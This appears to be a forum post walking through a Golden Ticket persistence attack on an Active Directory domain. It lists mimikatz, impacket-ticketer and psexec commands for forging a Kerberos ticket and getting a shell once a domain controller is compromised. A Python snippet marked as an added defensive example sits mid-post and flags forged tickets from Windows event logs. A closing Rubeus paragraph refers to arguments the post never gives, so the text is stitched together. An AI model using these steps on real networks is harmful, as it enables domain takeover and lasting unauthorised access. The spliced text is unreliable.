Hello Stackers,

Maintaining access in the AD (Active Directory) network

If you have compromised a DC and obtained Domain Admin, you can retain access rights by creating a golden ticket, so you are free to roam the network.

Domain persistence: the Golden Ticket attack

The Golden Ticket attack is a well-known technique to impersonate a user in an AD domain by abusing Kerberos authentication.
1. Extract the krbtgt NTLM hash with mimikatz, for example:
    lsadump::lsa /inject /name:krbtgt
2. Get the domain SID, for example:
    whoami /user
   or import the PowerShell script powerview.ps1 and then run Get-AdComputer.
3. Create the ticket with impacket-ticketer, for example:
    impacket-ticketer -nthash <krbtgt hash> -domain-sid <domain SID> -domain <domain> -dc-ip <ip> <user>
4. Import the ticket:
    export KRB5CCNAME=<path to your ticket>
5. Get a psexec shell:
    impacket-psexec domain/alwan@domain -k -no-pass
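As an added defensive example (not part of the original post), the Python below correlates Windows Security events on the domain controller: a forged TGT is never issued by the KDC, so a 4769 service-ticket request with no matching 4768 TGT request within the TGT lifetime, or for an account the directory does not know, is worth investigating. Event IDs 4768/4769 are real; the sample events, the account list and the lifetime value are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs): (timestamp, event_id, account, client_ip)
# 4768 = TGT requested (Kerberos AS exchange), 4769 = service ticket requested (TGS exchange).
SAMPLE_EVENTS = [
    ("2024-01-10T08:00:00", 4768, "alice", "10.0.0.5"),
    ("2024-01-10T08:00:02", 4769, "alice", "10.0.0.5"),
    ("2024-01-10T09:30:00", 4769, "alwan", "10.0.0.99"),  # no 4768 for this account/client at all
    ("2024-01-09T20:00:00", 4768, "bob", "10.0.0.7"),
    ("2024-01-10T09:45:00", 4769, "bob", "10.0.0.7"),     # 4768 exists but is older than the TGT lifetime
]

# Default AD policy caps TGT lifetime at 10 hours; assumed here, adjust to the domain's policy.
MAX_TGT_LIFETIME = timedelta(hours=10)
# Accounts known to exist in the directory (assumed; in practice pull this from AD).
KNOWN_ACCOUNTS = {"alice", "bob"}


def find_suspicious_tgs(events, known_accounts=KNOWN_ACCOUNTS, max_lifetime=MAX_TGT_LIFETIME):
    """Return 4769 events that lack a recent 4768 from the same account and client,
    or that name an account the directory does not know.

    Feed events from every DC in the domain: a legitimate TGT may be issued by one DC
    and presented to another, and correlating against a single DC's log gives false positives.
    """
    last_tgt = {}  # (account, client_ip) -> time of the most recent 4768
    known = {a.lower() for a in known_accounts}
    findings = []
    for ts, eid, acct, ip in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        key = (acct.lower(), ip)
        if eid == 4768:
            last_tgt[key] = t
        elif eid == 4769:
            reasons = []
            if acct.lower() not in known:
                reasons.append("account not in directory")
            issued = last_tgt.get(key)
            if issued is None:
                reasons.append("no 4768 seen for this account/client")
            elif t - issued > max_lifetime:
                reasons.append("TGT older than max lifetime")
            if reasons:
                findings.append((ts, acct, ip, reasons))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_tgs(SAMPLE_EVENTS):
        print(finding)
```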
The following describes the golden action of Rubeus, whose switches differ from those of impacket-ticketer used above. The golden action will forge a TGT for the user /user:X, encrypting the ticket with the hash passed with /des:X, /rc4:X, /aes128:X or /aes256:X, and using the same key to create the ServerChecksum and KDCChecksum. The various arguments to set fields manually are described above, or the /ldap flag can be used to automatically retrieve the information from the domain controller.
Okay, that's all folks, see you later.